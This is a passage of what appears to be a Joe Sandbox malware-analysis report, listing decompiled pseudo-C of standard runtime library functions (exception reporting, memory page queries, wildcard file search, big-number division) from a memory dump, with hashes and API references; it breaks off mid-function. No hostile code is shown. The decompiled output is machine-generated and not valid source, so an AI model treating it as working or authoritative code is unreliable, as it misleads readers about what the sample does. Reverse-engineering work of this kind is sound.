				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00B7FA46(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00B7FFF0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00B7FFF0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00B7FA46(_t49);
				}
				return _t49;
			}

0x00b7f838
0x00b7f838
0x00b7f838
0x00b7f84c
0x00b7f84e
0x00b7f851
0x00b7f851
0x00b7f855
0x00b7f85a
0x00b7f872
0x00b7f878
0x00b7f87e
0x00b7f884
0x00b7f88a
0x00b7f890
0x00b7f896
0x00b7f89d
0x00b7f8a4
0x00b7f8ab
0x00b7f8b2
0x00b7f8b9
0x00b7f8c0
0x00b7f8c1
0x00b7f8ca
0x00b7f8d0
0x00b7f8d3
0x00b7f8d9
0x00b7f8e8
0x00b7f8f4
0x00b7f8ff
0x00b7f906
0x00b7f90d
0x00b7f918
0x00b7f920
0x00b7f929
0x00b7f92b
0x00b7f92e
0x00b7f930
0x00b7f93a
0x00b7f942
0x00b7f948
0x00000000
0x00b7f94f
0x00b7f952

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B7F844
IsDebuggerPresent.KERNEL32 ref: 00B7F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B7F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00B7F93A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c8a8f345ce40f9552f2b8d25b5e583b225f601f6f9c3d50b232ef3242c5a1e45
Instruction ID: 484e01ed4193f1e4fc06897893f125a2b179f0840eef213d0f438e85e2ba2692
Opcode Fuzzy Hash: c8a8f345ce40f9552f2b8d25b5e583b225f601f6f9c3d50b232ef3242c5a1e45
Instruction Fuzzy Hash: 1C311875D05219DBDB20DFA4D9897DDBBF8AF08704F1080EAE50CAB250EB719B848F45

Uniqueness

Uniqueness Score: -1.00%

Function 00B7E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00B7E6A3(signed int _a4, signed int _a8) {
				struct _MEMORY_BASIC_INFORMATION _v32;
				struct _SYSTEM_INFO _v68;
				long _t20;
				signed int _t28;
				void* _t30;
				signed int _t32;
				signed int _t40;
				signed int _t45;

				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
				if(_t20 == 0) {
					_push(0x19);
					asm("int 0x29");
				}
				if((_v32.Protect & 0x00000044) != 0) {
					GetSystemInfo( &_v68);
					_t40 = _v68.dwPageSize;
					_t32 = _t40 - 1;
					_t45 =  !_t32 & _a4;
					_t28 = _a8 / _t40;
					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
					if(_t30 == 0) {
						L5:
						return _t28;
					} else {
						goto L4;
					}
					do {
						L4:
						_t28 = 0;
						asm("lock or [esi], eax");
						_t45 = _t45 + _t40;
						_t30 = _t30 - 1;
					} while (_t30 != 0);
					goto L5;
				}
				return _t20;
			}

0x00b7e6b4
0x00b7e6bc
0x00b7e6be
0x00b7e6c1
0x00b7e6c1
0x00b7e6c7
0x00b7e6cf
0x00b7e6d5
0x00b7e6d8
0x00b7e6ea
0x00b7e6fa
0x00b7e6fc
0x00b7e6fe
0x00b7e70c
0x00000000
0x00000000
0x00000000
0x00000000
0x00b7e700
0x00b7e700
0x00b7e700
0x00b7e702
0x00b7e705
0x00b7e707
0x00b7e707
0x00000000
0x00b7e700
0x00b7e70f

APIs

VirtualQuery.KERNEL32(80000000,00B7E5E8,0000001C,00B7E7DD,00000000,?,?,?,?,?,?,?,00B7E5E8,00000004,00BC1CEC,00B7E86D), ref: 00B7E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B7E5E8,00000004,00BC1CEC,00B7E86D), ref: 00B7E6CF

Strings

D, xrefs: 00B7E6C3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 9612e59e044c2ab8f03a3fa50a7aa84b18749b23e39454e707482b523cc22fe7
Instruction ID: 9d458829a421cfb97d3788c68ec3d9d88ac677d9ef86709b61d2e67f384be02e
Opcode Fuzzy Hash: 9612e59e044c2ab8f03a3fa50a7aa84b18749b23e39454e707482b523cc22fe7
Instruction Fuzzy Hash: F401F7326001096BDB14DE29DC09BDD7BEAEFC8328F0CC161ED2DD7154DA38ED058680

Uniqueness

Uniqueness Score: -1.00%

Function 00B88EBD Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00B88EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xb9e7ac; // 0x37e7c6f
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00B7FA46(_t41);
					_pop(_t61);
				}
				E00B7FFF0(_t66,  &_v804, 0, 0x50);
				E00B7FFF0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x7
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -805
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00B7FA46(_t57);
				}
				return E00B7FBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00b88ebd
0x00b88ebd
0x00b88ebd
0x00b88ec8
0x00b88ecd
0x00b88ecf
0x00b88ed7
0x00b88ed9
0x00b88edc
0x00b88ee1
0x00b88ee1
0x00b88eed
0x00b88f00
0x00b88f0e
0x00b88f14
0x00b88f1a
0x00b88f20
0x00b88f26
0x00b88f2c
0x00b88f32
0x00b88f38
0x00b88f3e
0x00b88f44
0x00b88f4b
0x00b88f52
0x00b88f59
0x00b88f60
0x00b88f67
0x00b88f6e
0x00b88f6f
0x00b88f78
0x00b88f7e
0x00b88f7e
0x00b88f81
0x00b88f87
0x00b88f94
0x00b88f9d
0x00b88fa6
0x00b88faf
0x00b88fbd
0x00b88fbf
0x00b88fc5
0x00b88fd4
0x00b88fe0
0x00b88fe3
0x00b88fe8
0x00b88ff7

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B88FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B88FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00B88FCC

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 776c16cca3d8dfefdecb3e32902cb00f233ad19e9dad2b0f0f9365118f626034
Instruction ID: 54be38083f254aff0487288356d341ec0aef8db54256d26881612ede6b713038
Opcode Fuzzy Hash: 776c16cca3d8dfefdecb3e32902cb00f233ad19e9dad2b0f0f9365118f626034
Instruction Fuzzy Hash: 0031C675901229ABCB21DF64DD89B9DBBF8EF08310F5041EAE41CA7260EB709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00B8B348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				void* _t79;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				signed int _t103;
				union _FINDEX_INFO_LEVELS _t104;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_t103 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
					_t5 = _t103 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t109 = E00B8B136(_t84, _t77, 1);
					_t86 = _t108;
					__eflags = _t103;
					if(_t103 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t103;
						_t40 = E00B8F101(_t86, _t109 + _t103, _t77, _a4);
						_t118 = _t117 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00B8B587(_a16, _t100, __eflags, _t109);
							E00B88DCC(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t103);
						_t74 = E00B8F101(_t86, _t109, _t77, _a8);
						_t118 = _t117 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00B89097();
							asm("int3");
							_t116 = _t118;
							_t119 = _t118 - 0x150;
							_t43 =  *0xb9e7ac; // 0x37e7c6f
							_v48 = _t43 ^ _t116;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t109);
							_t110 = _v332.cAlternateFileName;
							_push(_t103);
							_v372 = _t110;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00B8F150(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t104 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00B7FFF0(_t104,  &_v332, _t104, 0x140);
								_t120 = _t119 + 0xc;
								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
								_t55 = _v336;
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00B8B348(_t92,  &(_v332.cFileName), _t78, _v340);
											_t120 = _t120 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t111,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t101 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00B86310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E00B8B1A0);
									}
								} else {
									_push(_t55);
									_t57 = E00B8B348(_t89, _t78, _t104, _t104);
									L26:
									_t104 = _t57;
								}
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									FindClose(_t111);
								}
								_t58 = _t104;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t110);
									_t58 = E00B8B348(_t87, _t78, 0, 0);
								}
							}
							_pop(_t105);
							_pop(_t112);
							__eflags = _v12 ^ _t116;
							_pop(_t79);
							return E00B7FBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}

0x00b8b34d
0x00b8b34e
0x00b8b351
0x00b8b351
0x00b8b354
0x00b8b354
0x00b8b356
0x00b8b357
0x00b8b361
0x00b8b364
0x00b8b367
0x00b8b36c
0x00b8b375
0x00b8b378
0x00b8b382
0x00b8b385
0x00b8b386
0x00b8b388
0x00b8b39c
0x00b8b39c
0x00b8b39f
0x00b8b3a9
0x00b8b3ae
0x00b8b3b1
0x00b8b3b3
0x00000000
0x00b8b3b5
0x00b8b3b9
0x00b8b3c2
0x00b8b3c8
0x00000000
0x00b8b3cb
0x00b8b38a
0x00b8b38a
0x00b8b390
0x00b8b395
0x00b8b398
0x00b8b39a
0x00b8b3d1
0x00b8b3d3
0x00b8b3d4
0x00b8b3d5
0x00b8b3d6
0x00b8b3d7
0x00b8b3d8
0x00b8b3dd
0x00b8b3e1
0x00b8b3e3
0x00b8b3e9
0x00b8b3f0
0x00b8b3f3
0x00b8b3f6
0x00b8b3f7
0x00b8b3fa
0x00b8b3fb
0x00b8b3fe
0x00b8b3ff
0x00b8b420
0x00b8b420
0x00b8b422
0x00000000
0x00000000
0x00b8b407
0x00b8b409
0x00b8b40b
0x00b8b40d
0x00b8b40f
0x00b8b411
0x00b8b413
0x00b8b41e
0x00000000
0x00b8b41e
0x00b8b413
0x00b8b40f
0x00000000
0x00b8b40b
0x00b8b424
0x00b8b426
0x00b8b429
0x00b8b442
0x00b8b442
0x00b8b444
0x00b8b447
0x00b8b457
0x00b8b459
0x00b8b459
0x00b8b449
0x00b8b449
0x00b8b44c
0x00000000
0x00b8b44e
0x00b8b44e
0x00b8b451
0x00000000
0x00b8b453
0x00b8b453
0x00b8b453
0x00b8b451
0x00b8b44c
0x00b8b45f
0x00b8b467
0x00b8b46b
0x00b8b479
0x00b8b47e
0x00b8b493
0x00b8b495
0x00b8b49b
0x00b8b49e
0x00b8b4d0
0x00b8b4d0
0x00b8b4d2
0x00b8b4d5
0x00b8b4db
0x00b8b4db
0x00b8b4e2
0x00b8b4fc
0x00b8b4fc
0x00b8b50b
0x00b8b510
0x00b8b513
0x00b8b515
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8b4e4
0x00b8b4e4
0x00b8b4ea
0x00b8b4ec
0x00000000
0x00b8b4ee
0x00b8b4ee
0x00b8b4f1
0x00000000
0x00b8b4f3
0x00b8b4f3
0x00b8b4fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8b4fa
0x00b8b4f1
0x00b8b4ec
0x00000000
0x00b8b517
0x00b8b51f
0x00b8b525
0x00b8b527
0x00b8b527
0x00b8b52f
0x00b8b534
0x00b8b53c
0x00b8b53f
0x00b8b541
0x00b8b555
0x00b8b55a
0x00b8b4a0
0x00b8b4a0
0x00b8b4a4
0x00b8b4ac
0x00b8b4ac
0x00b8b4ac
0x00b8b4ae
0x00b8b4b1
0x00b8b4b4
0x00b8b4b4
0x00b8b4ba
0x00b8b42b
0x00b8b42e
0x00b8b430
0x00000000
0x00b8b432
0x00b8b432
0x00b8b438
0x00b8b43d
0x00b8b430
0x00b8b4bf
0x00b8b4c0
0x00b8b4c1
0x00b8b4c3
0x00b8b4cc
0x00000000
0x00000000
0x00000000
0x00b8b39a
0x00b8b36e
0x00b8b370
0x00b8b3cc
0x00b8b3d0
0x00b8b3d0
0x00000000

Strings

., xrefs: 00B8B4DB

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: cdcc9597be4a294125b05ef5326969780f222b72ca1f9bc660ca67f18d040f88
Instruction ID: d2e4bcb4a17ffa62e454b7d677debfe9c42f9dd3f6152be8b1f84f97869f17e6
Opcode Fuzzy Hash: cdcc9597be4a294125b05ef5326969780f222b72ca1f9bc660ca67f18d040f88
Instruction Fuzzy Hash: 1B31E471900249AFCB24AE78CC85EFB7BFDDB85314F1841E8E91997262E7309E45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8D440 Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E00B8D440(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00B7F0C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00B921C0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00B7F0E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
